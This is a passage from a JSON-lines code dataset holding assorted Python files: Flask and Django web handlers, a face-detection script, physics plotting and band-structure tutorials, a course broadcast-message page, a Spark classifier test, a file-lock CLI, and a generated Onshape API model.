content)\n","sub_path":"svnchecker/tags/0.2.1_20080715_REL/svnchecker/tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125879122","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.template import Context, loader\nfrom models import Item\n\ndef item_page_display(request,item_id):\n # item_idに該当するオブジェクトを取得する\n item = Item.objects.get(id=item_id)\n # テンプレートを取得して、モデルの値とマージする\n t = loader.get_template('page/item.html')\n c = Context(\n {'item':item }\n )\n # HTTP Responseを返す。\n return HttpResponse(t.render(c))\n\n\n","sub_path":"craft/djangotmp/apptmp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40601950","text":"import re\nimport os\nimport xml.etree.ElementTree as ET\nfrom flask import Flask, json\nfrom flask import jsonify\nfrom flask.globals import request\nfrom flask_cors import CORS\nfrom xml.dom import minidom\n\n\nglobal archivo\n\napp = Flask(__name__)\nCORS(app)\n\nclass Data():\n def __init__(self, evento):\n self.evento = evento\n\n def obtenerDatos(self):\n datos_evento = {} \n datos = self.evento\n rcorreo = re.compile('[\\w]+@\\S+')\n rfecha = re.compile('(?:[0-9]{2}/){2}[0-9]{2}')\n rerror = re.compile('[0-9]{5,}')\n correos = re.findall(rcorreo, datos)\n fechas = re.findall(rfecha, datos)\n errores = re.findall(rerror, datos)\n datos_evento['fecha'] = fechas\n datos_evento['reportado'] = correos[0]\n datos_evento['afectados'] = correos[1:]\n datos_evento['error'] = errores\n return datos_evento\n\n@app.route('/', methods=['GET'])\ndef index():\n return('Api en Flask')\n\n@app.route('/data', methods=['POST'])\ndef data():\n global archivo\n cantidad_mensajes = {}\n archivo = request.files['archivo']\n tree = ET.parse(archivo)\n root = tree.getroot()\n eventos = []\n for evento in root:\n eventos.append(Data(evento.text).obtenerDatos())\n print(evento.text)\n #print(eventos)\n contador = 0\n for evento in eventos:\n for key in evento:\n if key == 'fecha':\n print(f'El key es: {key} y el valor es: {evento[key]}')\n if evento[key][0] in cantidad_mensajes:\n cantidad_mensajes[evento[key][0]] += 1\n else:\n cantidad_mensajes[evento[key][0]] = 1\n\n #Creando XML Estadísticas\n \n raiz_estadisticas = ET.Element('ESTADISTICAS')\n cant_mens = 1\n for key in cantidad_mensajes:\n et_estadistica = ET.SubElement(raiz_estadisticas, 'ESTADISTICA')\n et_dato = ET.SubElement(et_estadistica, 'FECHA')\n et_dato2 = ET.SubElement(et_estadistica, 'CANTIDAD_MENSAJES')\n et_dato.text = str(key)\n et_dato2.text = str(cantidad_mensajes[key])\n correos_leidos = []\n\n for evento in eventos:\n if evento['fecha'][0] == key:\n if evento['reportado'] in correos_leidos:\n cant_mens += 1\n else:\n et_dato3 = ET.SubElement(et_estadistica, 'REPORTADO_POR')\n et_dato4 = ET.SubElement(et_dato3, 'USUARIO')\n et_dato5 = ET.SubElement(et_dato4, 'EMAIL')\n et_dato6 = ET.SubElement(et_dato4, 'CANTIDAD_MENSAJES')\n et_dato5.text = str(evento['reportado'])\n et_dato6.text = str(cant_mens)\n correos_leidos.append(evento['reportado'])\n cant_mens = 1\n et_dato7 = ET.SubElement(et_estadistica, 'AFECTADOS')\n \n for i in range(len(evento['afectados'])):\n et_dato8 = ET.SubElement(et_dato7, 'AFECTADO')\n et_dato8.text = str(evento['afectados'][i])\n\n et_dato9 = ET.SubElement(et_estadistica, 'ERRORES')\n et_dato10 = ET.SubElement(et_dato9, 'ERROR')\n et_dato11 = ET.SubElement(et_dato10, 'CODIGO')\n et_dato11.text = str(evento['error'][0])\n et_dato12 = ET.SubElement(et_dato10, 'CANTIDAD_MENSAJES')\n et_dato12.text = str(cant_mens)\n xml_estadisticas = ET.tostring(raiz_estadisticas, 'utf-8')\n xml_parseado = minidom.parseString(xml_estadisticas).toprettyxml(indent='\\t')\n f = open('estadisticas.xml', 'w')\n f.write(xml_parseado)\n f.close()\n \n print(cantidad_mensajes)\n return ('Leída exitosa')\n\n@app.route('/reset', methods=['GET'])\ndef reset():\n global archivo\n archivo = None\n return('Api reiniciada')\n\n@app.route('/consultar', methods=['GET'])\ndef consultar():\n if request.method != 'GET':\n return 'Peticion no válida'\n file = open('estadisticas.xml', 'r')\n contenido = ''.join(file.readlines())\n file.close()\n return contenido\n\n@app.route('/documentacion', methods=['GET'])\ndef documentacion():\n if request.method != 'GET':\n return 'Petición no válida'\n file = \"EnsayoProyecto3.pdf\"\n os.popen(file)\n return 'Abriendo documentacion...'\n\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)","sub_path":"Backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158130953","text":"import time\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom time import time\nfrom skimage import color, feature\nfrom skimage import transform\nimport skimage\nimport joblib\nimport threading\nimport multiprocessing\nimport matplotlib.image as mpimg\n\ndef merge_boxes(indices):\n avg_x = 0.0\n avg_y = 0.0\n for x in indices:\n avg_x += x[0]\n avg_y += x[1]\n try:\n avg_x = avg_x / len(indices)\n avg_y = avg_y / len(indices)\n except ZeroDivisionError:\n return -1, -1\n return int(avg_x), int(avg_y)\n\n\ndef my_nms(indices, height, width, max_distance):\n # TODO : make max distance a percent num rather that pixel distance\n indies = indices[0][0], indices[0][1]\n splits = [[]]\n counter = 0\n for patch in indices:\n if abs(indies[1] - patch[1]) > max_distance or abs(indies[0] - patch[0]) > max_distance:\n splits.append([patch])\n counter += 1\n else:\n splits[counter].append(indies)\n indies = patch[0], patch[1]\n final_avg = []\n for split in splits:\n final_avg.append((merge_boxes(split)))\n print(len(splits))\n return final_avg\n\n\ndef worker(patches):\n return [feature.hog(patch) for patch in patches]\n\n\ndef sliding_window(img, patch_size=(62,47), istep=3, jstep=3, scale=1.0):\n Ni, Nj = (int(scale * s) for s in patch_size)\n for i in range(0, img.shape[0] - Ni, istep):\n for j in range(0, img.shape[1] - Nj, jstep):\n patch = img[i:i + Ni, j:j + Nj]\n if scale != 1:\n patch = transform.resize(patch, patch_size)\n yield (i, j), patch\n\n\ndef dynamic_window(test_image, fast_model, slow):\n img, img_size, img_jump = test_image,0.25, 0.05\n labels = np.zeros(0)\n steps, step_jump, flag = 7, 1, True\n while labels.sum() == 0.0:\n #TODO: change to cnn\n img = skimage.transform.rescale(test_image, img_size)\n\n t = time()\n indices, patches = zip(*sliding_window(img, istep=steps, jstep=steps))\n print(\"[INFO] sliding window took: {:.2f} seconds\".format(time() - t))\n\n t = time()\n patches_hog = np.array([feature.hog(patch) for patch in patches])\n print(\"[INFO] hog patches took: {:.2f} seconds\".format(time() - t))\n\n t = time()\n fast_labels = np.array(fast_model.predict(patches_hog))\n if fast_labels.sum() == 0.0:\n steps -= 1\n continue\n print(\"[INFO] fast predict took: {:.2f} seconds\".format(time() - t))\n print(fast_labels.sum())\n\n patches_hog = patches_hog[fast_labels == 1]\n indices = np.array(indices)\n indices = indices[fast_labels == 1]\n\n t = time()\n # patchs = patchs.reshape(-1, 62, 47, 1)\n labels = slow.predict(patches_hog)\n\n # labels = np.array([p[0] for p in prediction])\n print(\"[INFO] cnn predict took: {:.2f} seconds\".format(time() - t))\n img_size -= img_jump\n if flag:\n steps -= step_jump\n flag = False\n else:\n flag = True\n indices = indices[labels == 1]\n return indices, img_size+img_jump\n #return labels, indices, patches_hog, img\n\n\ndef test(model, fast_model, face_patch_size, image):\n\n #test_image = plt.imread(image)\n #test_image = skimage.data.astronaut()\n #test_image = skimage.color.rgb2gray(test_image)\n test_image = image\n try:\n t = time()\n indices, img_size = dynamic_window(test_image, fast_model, model)\n #fast_labels, indices, patches_hog, test_image = dynamic_window(test_image, fast_model, model)\n except ValueError as e:\n print(\"No bounding box!\",e)\n return []\n if indices.sum() == 0.0:\n raise (Exception(\"No bounding box!\"))\n print(\"[INFO] dynamic window took: {:.2f} seconds\".format(time()-t))\n\n boxes = my_nms(indices, 62, 47, 15) # returns array with x,y position of faces\n return boxes,img_size\n #show result\n \"\"\"Ni, Nj = face_patch_size\n fig, ax = plt.subplots()\n ax.imshow(test_image, cmap='gray')\n\n for i, j in boxes:\n ax.add_patch(plt.Rectangle((j, i), Nj, Ni, edgecolor='blue',\n alpha=0.3, lw=2, facecolor='none'))\n plt.waitforbuttonpress()\"\"\"\n\n\ndef main():\n path = r\"C:\\Users\\user\\Desktop\\final project\\FaceRecognition\\face-clustering\\test\"\n img = r\"\\WhatsApp Image 2020-04-08 at 13.35.55 (5)\"\n fast_model = joblib.load(r\"models\\model_fast.pickle\")\n slow = joblib.load(r\"models\\model5.pickle\")\n test(slow,fast_model, (62, 47), path+img+\".jpeg\")\n\n\nif __name__ == '__main__':\n main()","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76046671","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 3 11:41:47 2020\r\n\r\n@author: amirc\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n#from functions_of_thickness import*\r\nfrom general_functions import *\r\n#from newanalysis_for_characterization import*\r\n#from file_functions import*\r\nimport pickle\r\n\r\n\r\n\r\n#jz_data=np.load('jz_t50point0.npz')\r\n#uiz_data=np.load('uiz_t50point0.npz')\r\n#rho_data=np.load('rho_t50point0.npz')\r\n\r\n\r\njz=jz_data['jz']\r\nuiz=uiz_data['uiz']\r\nrho=rho_data['rho']\r\n\r\n\r\nnx = jz.shape[0]\r\nny = jz.shape[1]\r\n\r\n\r\nuez=uiz-jz/rho\r\nratio= abs(uez)/abs(uiz)\r\nuiz_rms=np.sum(uiz**2)/(nx*ny)\r\n\r\n\r\nx_indices=[index[0] for index in indexes_of_valid_local_maxima]\r\ny_indices=[index[1] for index in indexes_of_valid_local_maxima]\r\n\r\nuiz_peak=abs(uiz[x_indices,y_indices])\r\n#ion_velocity = uiz_peak.tolist()\r\n\r\nuez_peak=abs(uiz[x_indices,y_indices]-jz[x_indices,y_indices]/rho[x_indices,y_indices])\r\n#electron_velocity = uez_peak.tolist()\r\n\r\nratio1 = uez_peak / uiz_peak\r\n\r\n#ratio1 = [i / j for i, j in zip(electron_velocity,ion_velocity)] \r\n\r\n##############################################################################\r\n\r\nratio2 = abs(1 - 1/np.array(ave_thicknesses)**2)\r\n\r\n# ratio2= [1-1/i**2 for i in ave_thicknesses] \r\n# e=[abs(number) for number in ratio2]\r\n\r\n#############################################################################\r\n\r\n\r\n\r\n# plotting -----------------------------\r\nplt.rcParams['font.size'] = 20\r\nplt.figure()\r\nplt.scatter(ratio2[filter_by_ave_thickness], ratio1[filter_by_ave_thickness])\r\nplt.xlabel('$|1-1/L^2|$')\r\nplt.ylabel('$|u_{ez}|/|u_{iz}|$')\r\nplt.grid()\r\nplt.title('Filtered points')\r\nplt.show()\r\nplt.tight_layout()\r\n\r\n\r\nplt.rcParams['font.size'] = 20\r\nplt.figure()\r\nplt.scatter(ratio2, ratio1)\r\nplt.xlabel('$|1-1/L^2|$')\r\nplt.ylabel('$|u_{ez}|/|u_{iz}|$')\r\nplt.grid()\r\nplt.title('All points')\r\nplt.show()\r\nplt.tight_layout()\r\n","sub_path":"uezuizplot.py","file_name":"uezuizplot.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"218850088","text":"\"\"\"\nPlotting the lattice and band structure of a square lattice and monolayer\ngraphene\n\"\"\"\nimport pybinding as pb\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import sqrt,pi\n\npb.pltutils.use_style()\n\ndef sqr_lattice(ucl,t):\n \"\"\"Returns a square lattice with unit cell length ucl and hopping t\"\"\"\n lat = pb.Lattice(a1 = [ucl,0], a2 = [0,ucl])\n lat.add_sublattices(('A',[0,0]))\n lat.add_hoppings(([0,1],'A','A',t),([1,0],'A','A',t))\n return(lat)\n\ndef monolayer_graphene():\n \"\"\"Returns a littce object that looks like monolayer graphene\"\"\"\n a = 0.24595 # A\n aCC = 0.142 # A\n t = -2.8 # eV\n lat = pb.Lattice(a1 = [a,0], a2 = [a/2,sqrt(3)*a/2])\n lat.add_sublattices(('A',[0,-aCC/2]),('B',[0,aCC/2]))\n lat.add_hoppings(\n ([0,0],'A','B',t),\n ([1,-1],'A','B',t),\n ([0,-1],'A','B',t))\n return(lat)\n\ndef __main__():\n mlgLattice = monolayer_graphene()\n\n model = pb.Model(mlgLattice,pb.translational_symmetry())\n solver = pb.solver.lapack(model)\n\n aCC = 0.142\n Gamma = [0, 0]\n K1 = [-4*pi / (3*sqrt(3)*aCC), 0]\n M = [0, 2*pi / (3*aCC)]\n K2 = [2*pi / (3*sqrt(3)*aCC), 2*pi / (3*aCC)]\n\n bands = solver.calc_bands(K1, Gamma, M, K2)\n\n bands.plot(point_labels=['K', r'$\\Gamma$', 'M', 'K'])\n\n plt.show()\n\nif __name__==\"__main__\":\n __main__()\n\n\n\"\"\"\n xPos=model.system.x\n yPos=model.system.y\n subLats=model.system.sublattices\n ham=model.hamiltonian.todense()\n print(xPos,yPos,subLats,\"\\n\",ham)\n\n eigVals=solver.eigenvalues\n eigVecs=solver.eigenvectors\n print(eigVals,eigVecs)\n\"\"\"","sub_path":"TB_tutorial/tb_tutorial_01.py","file_name":"tb_tutorial_01.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69092005","text":"'''broadcast: real-time announcements to all catsoop users of this site\n\nStaff: access this page to enter a message and submit it to be\nbroadcast. The message is stored on the server as a json dict, with\ntimestamp and author. All messages are also archived in a catsoop log\nfile.\n\nStudents: javascript code (automatically loaded) polls the server for\na broadcast message, and displays it if unexpired (e.g. within 5\nminutes of creation). Once marked as having been seen, it is not\nredisplayed.\n\n'''\nimport os\nimport re\nimport sys\nimport json\nimport time\nimport logging\nimport datetime\nimport traceback\n\nLOGGER = logging.getLogger(\"cs\")\n\n#-----------------------------------------------------------------------------\n# main dispatch function\n'''\nHow this works:\n\nAt the bottom of this file, following lines are executed:\n RQ = RemoteQueue()\n cs_problem_spec = RQ.dispatch(cs_form)\n\nThis tells catsoop to use the dispatch function of the RemoteQueue for all processing\n\nRemoteQueue.dispatch\n Given the form data for the page and the person viewing the page, it determines what the person should see.\n If staff and form_data is empty: show the form for inputting video URL\n If staff and person has saved info/pressed submit: show 'saved' and save data and update remotequeue database:\n data = {'url': url, 'active': active}\n csm_cslog.update_log(self.db_name, [], cs_username, data)\n If person is not staff: run ajax_get_url\n'''\nclass BroadcastMessage:\n\n db_name = \"broadcast_message\"\n MSG_FILE = \"~/cs_broadcast.json\"\n\n def __init__(self, verbose=True):\n self.verbose = verbose\n user_role = cs_user_info.get('role', None)\n self.is_staff = user_role in {'LA', 'TA', 'UTA', 'Admin', 'Instructor'}\n self.is_authorized = user_role in {'TA','Admin', 'Instructor'}\n self.my_url = \"/\".join([cs_url_root] + cs_path_info)\n self.course = _course_number\n\n def dispatch(self, form_data=None):\n '''\n main entry point to generate html responses\n '''\n if form_data is None:\n return \"\"\n if not len(form_data) and self.is_authorized:\n return self.show_form()\n if 'Broadcast' in form_data and self.is_authorized:\n return self.process_form_save(form_data)\n if 'get' in form_data:\n return self.ajax_get_msg(form_data)\n if self.is_authorized:\n return self.show_form()\n return \"\"\n #return \"
%s
\" % form_data # for debugging\n\n def ajax_get_msg(self, form_data):\n '''\n If staff claimant is active, and has remote url, then return a link to this service, but with \"go=\"\n This will let us log actual number of clicks to start video sessions.\n '''\n global cs_handler, content_type, response\n data = self.get_message()\n html = json.dumps(data)\n cs_handler = 'raw_response'\n content_type = \"application/json\"\n response = html\n return \"\"\n\n def get_message(self, get_all=False):\n '''\n Get current message (if all==False); else return all messages, sorted from recent to oldest\n '''\n loginfo = (self.course, [self.db_name], \"all\")\n if get_all:\n data = csm_cslog.read_log(*loginfo)\n return data\n data = csm_cslog.most_recent(*loginfo, lock=False)\n if not data:\n return {}\n if data.get(\"audience\")==\"staff\":\n if self.is_staff:\n return data\n return {}\n return data\n\n def save_message(self, msg=None, audience=None, write_to_file=True):\n '''\n Save URL data (url and active or not)\n \n if write_to_file then also write JSON to self.MSG_FILE (accessed directly by nginx, to reduce catsoop load)\n '''\n data = {'msg': msg, 'creator': cs_username, 'audience': audience, 'datetime': str(datetime.datetime.now())}\n csm_cslog.update_log(self.course, [self.db_name], \"all\", data)\n LOGGER.info(\"[BroadcastMessage] saved data=%s for username=%s!\" % (data, cs_username))\n fn = os.path.expanduser(self.MSG_FILE)\n with open(fn, 'w') as ofp:\n ofp.write(json.dumps(data))\n\n def process_form_save(self, form_data):\n '''\n Save data from form\n '''\n msg = form_data.get(\"msg\")\n everyone = form_data.get(\"everyone\", \"staff\")\n audience = everyone\n if audience==\"on\":\n audience = \"all\"\n if msg:\n self.save_message(msg, audience)\n html = \"Message broadcast!\"\n else:\n html = \"Empty message: nothing done\"\n return self.show_form(extra_html=html)\n\n def show_form(self, extra_html=\"\"):\n '''\n Show input form asking for message\n Also show list of old messages\n '''\n data = self.get_message(get_all=True)\n html = \"

Fill in this form to immediately broadcast a message to users currently connected to the course's sytem. \"\n html += \"Select 'staff only' to limit the message to just staff, or 'everyone' to send to all users

\"\n html += \"
\"\n html += '''

New (short) message to broadcast:

'''\n html += \"\"\"

Send to staff only Broadcast to everyone: students and staff

\n \"\"\"\n html += '''

'''\n html += \"
\"\n html += extra_html\n\n html += \"
\"\n html += \"\"\n for msginfo in data[::-1]:\n html += \"\" % (msginfo.get(\"datetime\"),\n msginfo.get(\"creator\"),\n msginfo.get(\"audience\"),\n msginfo.get(\"msg\"))\n html += \"
DateAuthorAudienceMessage
%s%s%s%s
\"\n html += \"
\"\n\n return html\n\n#-----------------------------------------------------------------------------\n# this tells catsoop to use the dispatch function for all processing\n\nBM = BroadcastMessage()\ncs_problem_spec = BM.dispatch(cs_form)\n","sub_path":"broadcast/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297533263","text":"from pathlib import Path\nfrom fruit_classifier.preprocessing.preprocessing_utils import \\\n remove_non_images\nfrom fruit_classifier.preprocessing.preprocessing_utils import \\\n truncate_filenames\n\n\ndef main():\n \"\"\"\"\n Pre-processes the images in raw_data\n\n The resulting images are stored in cleaned_data\n \"\"\"\n\n generated_data_dir = \\\n Path(__file__).absolute().parents[2].joinpath('generated_data')\n raw_dir = generated_data_dir.joinpath('raw_data')\n cleaned_dir = generated_data_dir.joinpath('cleaned_data')\n\n # Shorten filenames if they are so long that Windows protests\n truncate_filenames(raw_dir)\n\n if not cleaned_dir.is_dir():\n cleaned_dir.mkdir(parents=True, exist_ok=True)\n\n remove_non_images(raw_dir, cleaned_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fruit_classifier/preprocessing/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308364635","text":"import shutil\nimport tempfile\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom nose.tools import assert_equal\nfrom nose.tools import assert_true\nfrom numpy.testing import assert_array_almost_equal\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.linear_model import SGDClassifier\n\nfrom common import SplearnTestCase\nfrom splearn.rdd import ArrayRDD, DictRDD\nfrom splearn.linear_model import SparkSGDClassifier\n\n\nclass LinearModelStochasticGradientTestCase(SplearnTestCase):\n\n def setUp(self):\n super(LinearModelStochasticGradientTestCase, self).setUp()\n self.outputdir = tempfile.mkdtemp()\n\n def tearDown(self):\n super(LinearModelStochasticGradientTestCase, self).tearDown()\n shutil.rmtree(self.outputdir)\n\n def generate_dataset(self, n_classes, n_samples, blocks=None):\n X, y = make_classification(n_classes=n_classes,\n n_samples=n_samples, n_features=10,\n n_informative=4, n_redundant=0,\n n_clusters_per_class=1,\n random_state=42)\n\n X_rdd = self.sc.parallelize(X, 4)\n y_rdd = self.sc.parallelize(y, 4)\n Z_rdd = X_rdd.zip(y_rdd)\n\n Z = DictRDD(Z_rdd, columns=('X', 'y'), block_size=blocks)\n\n return X, y, Z\n\n\nclass TestSGDClassifier(LinearModelStochasticGradientTestCase):\n\n def test_same_prediction(self):\n X, y, Z = self.generate_dataset(2, 80000)\n\n local = SGDClassifier(average=True)\n dist = SparkSGDClassifier(average=True)\n\n local.fit(X, y)\n dist.fit(Z, classes=np.unique(y))\n\n y_local = local.predict(X)\n y_dist = np.concatenate(dist.predict(Z[:, 'X']).collect())\n\n mismatch = y_local.shape[0] - np.count_nonzero(y_dist == y_local)\n mismatch_percent = float(mismatch) * 100 / y_local.shape[0]\n\n assert_true(mismatch_percent <= 1)\n","sub_path":"python/test/test_linear_model_stochastic_gradient.py","file_name":"test_linear_model_stochastic_gradient.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266548361","text":"from filelock import Timeout, FileLock\nfrom colorama import Fore\nimport argparse\n\n\ndef main():\n print(Fore.GREEN + 'GIT LOCKER\\n' + Fore.LIGHTGREEN_EX + 'Run -h to get started' + Fore.RESET)\n\n parser = argparse.ArgumentParser('Commands for git-locker')\n parser.add_argument('-l', help='locks a file')\n parser.add_argument('-t', help='Time limit for the file to be locked')\n parser.add_argument('-pg', help='Prevent git from committing the file [F|T]')\n args = parser.parse_args()\n\n if not args.l or not args.t:\n print(Fore.RED + '[X] Invalid usage!')\n print(Fore.RED + '[+] ' + parser.usage + Fore.RESET)\n else:\n file_path = args.l\n lock_path = file_path + '.lock'\n timeout = args.t\n lock = FileLock(lock_file=lock_path)\n print(\n Fore.GREEN + '[+]' + Fore.LIGHTCYAN_EX + ' locked file ' + Fore.MAGENTA + lock_path + Fore.LIGHTCYAN_EX\n + ' for ' + Fore.MAGENTA + str(timeout))\n try:\n with lock.acquire(timeout=timeout):\n if not lock.is_locked and timeout == 0:\n print(Fore.BLUE + '[*] Releasing lock!')\n lock.release()\n except Timeout:\n print(Fore.RED + '[X] Another instance is currently holding a lock!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"locker.py","file_name":"locker.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389850490","text":"# coding: utf-8\n\n\"\"\"\n Onshape REST API\n\n The Onshape REST API consumed by all clients. # noqa: E501\n\n The version of the OpenAPI document: 1.113\n Contact: api-support@onshape.zendesk.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import absolute_import\nimport re # noqa: F401\nimport sys # noqa: F401\n\nimport six # noqa: F401\nimport nulltype # noqa: F401\n\nfrom onshape_client.oas.model_utils import ( # noqa: F401\n ModelComposed,\n ModelNormal,\n ModelSimple,\n date,\n datetime,\n file_type,\n int,\n none_type,\n str,\n validate_get_composed_info,\n)\n\ntry:\n from onshape_client.oas.models import three_d_secure\nexcept ImportError:\n three_d_secure = sys.modules[\"onshape_client.oas.models.three_d_secure\"]\n\n\nclass Card(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n additional_properties_type = None\n\n @staticmethod\n def openapi_types():\n \"\"\"\n This must be a class method so a model may have properties that are\n of type self, this ensures that we don't create a cyclic import\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n \"account\": (str,), # noqa: E501\n \"address_city\": (str,), # noqa: E501\n \"address_country\": (str,), # noqa: E501\n \"address_line1\": (str,), # noqa: E501\n \"address_line1_check\": (str,), # noqa: E501\n \"address_line2\": (str,), # noqa: E501\n \"address_state\": (str,), # noqa: E501\n \"address_zip\": (str,), # noqa: E501\n \"address_zip_check\": (str,), # noqa: E501\n \"available_payout_methods\": ([str],), # noqa: E501\n \"brand\": (str,), # noqa: E501\n \"country\": (str,), # noqa: E501\n \"currency\": (str,), # noqa: E501\n \"customer\": (str,), # noqa: E501\n \"cvc_check\": (str,), # noqa: E501\n \"default_for_currency\": (bool,), # noqa: E501\n \"description\": (str,), # noqa: E501\n \"dynamic_last4\": (str,), # noqa: E501\n \"exp_month\": (int,), # noqa: E501\n \"exp_year\": (int,), # noqa: E501\n \"fingerprint\": (str,), # noqa: E501\n \"funding\": (str,), # noqa: E501\n \"id\": (str,), # noqa: E501\n \"iin\": (str,), # noqa: E501\n \"instance_url\": (str,), # noqa: E501\n \"issuer\": (str,), # noqa: E501\n \"last4\": (str,), # noqa: E501\n \"metadata\": ({str: (str,)},), # noqa: E501\n \"name\": (str,), # noqa: E501\n \"object\": (str,), # noqa: E501\n \"recipient\": (str,), # noqa: E501\n \"status\": (str,), # noqa: E501\n \"three_d_secure\": (three_d_secure.ThreeDSecure,), # noqa: E501\n \"tokenization_method\": (str,), # noqa: E501\n \"type\": (str,), # noqa: E501\n }\n\n @staticmethod\n def discriminator():\n return None\n\n attribute_map = {\n \"account\": \"account\", # noqa: E501\n \"address_city\": \"addressCity\", # noqa: E501\n \"address_country\": \"addressCountry\", # noqa: E501\n \"address_line1\": \"addressLine1\", # noqa: E501\n \"address_line1_check\": \"addressLine1Check\", # noqa: E501\n \"address_line2\": \"addressLine2\", # noqa: E501\n \"address_state\": \"addressState\", # noqa: E501\n \"address_zip\": \"addressZip\", # noqa: E501\n \"address_zip_check\": \"addressZipCheck\", # noqa: E501\n \"available_payout_methods\": \"availablePayoutMethods\", # noqa: E501\n \"brand\": \"brand\", # noqa: E501\n \"country\": \"country\", # noqa: E501\n \"currency\": \"currency\", # noqa: E501\n \"customer\": \"customer\", # noqa: E501\n \"cvc_check\": \"cvcCheck\", # noqa: E501\n \"default_for_currency\": \"defaultForCurrency\", # noqa: E501\n \"description\": \"description\", # noqa: E501\n \"dynamic_last4\": \"dynamicLast4\", # noqa: E501\n \"exp_month\": \"expMonth\", # noqa: E501\n \"exp_year\": \"expYear\", # noqa: E501\n \"fingerprint\": \"fingerprint\", # noqa: E501\n \"funding\": \"funding\", # noqa: E501\n \"id\": \"id\", # noqa: E501\n \"iin\": \"iin\", # noqa: E501\n \"instance_url\": \"instanceURL\", # noqa: E501\n \"issuer\": \"issuer\", # noqa: E501\n \"last4\": \"last4\", # noqa: E501\n \"metadata\": \"metadata\", # noqa: E501\n \"name\": \"name\", # noqa: E501\n \"object\": \"object\", # noqa: E501\n \"recipient\": \"recipient\", # noqa: E501\n \"status\": \"status\", # noqa: E501\n \"three_d_secure\": \"threeDSecure\", # noqa: E501\n \"tokenization_method\": \"tokenizationMethod\", # noqa: E501\n \"type\": \"type\", # noqa: E501\n }\n\n @staticmethod\n def _composed_schemas():\n return None\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_from_server\",\n \"_path_to_item\",\n \"_configuration\",\n ]\n )\n\n def __init__(\n self,\n _check_type=True,\n _from_server=False,\n _path_to_item=(),\n _configuration=None,\n **kwargs\n ): # noqa: E501\n \"\"\"card.Card - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _from_server (bool): True if the data is from the server\n False if the data is from the client (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n account (str): [optional] # noqa: E501\n address_city (str): [optional] # noqa: E501\n address_country (str): [optional] # noqa: E501\n address_line1 (str): [optional] # noqa: E501\n address_line1_check (str): [optional] # noqa: E501\n address_line2 (str): [optional] # noqa: E501\n address_state (str): [optional] # noqa: E501\n address_zip (str): [optional] # noqa: E501\n address_zip_check (str): [optional] # noqa: E501\n available_payout_methods ([str]): [optional] # noqa: E501\n brand (str): [optional] # noqa: E501\n country (str): [optional] # noqa: E501\n currency (str): [optional] # noqa: E501\n customer (str): [optional] # noqa: E501\n cvc_check (str): [optional] # noqa: E501\n default_for_currency (bool): [optional] # noqa: E501\n description (str): [optional] # noqa: E501\n dynamic_last4 (str): [optional] # noqa: E501\n exp_month (int): [optional] # noqa: E501\n exp_year (int): [optional] # noqa: E501\n fingerprint (str): [optional] # noqa: E501\n funding (str): [optional] # noqa: E501\n id (str): [optional] # noqa: E501\n iin (str): [optional] # noqa: E501\n instance_url (str): [optional] # noqa: E501\n issuer (str): [optional] # noqa: E501\n last4 (str): [optional] # noqa: E501\n metadata ({str: 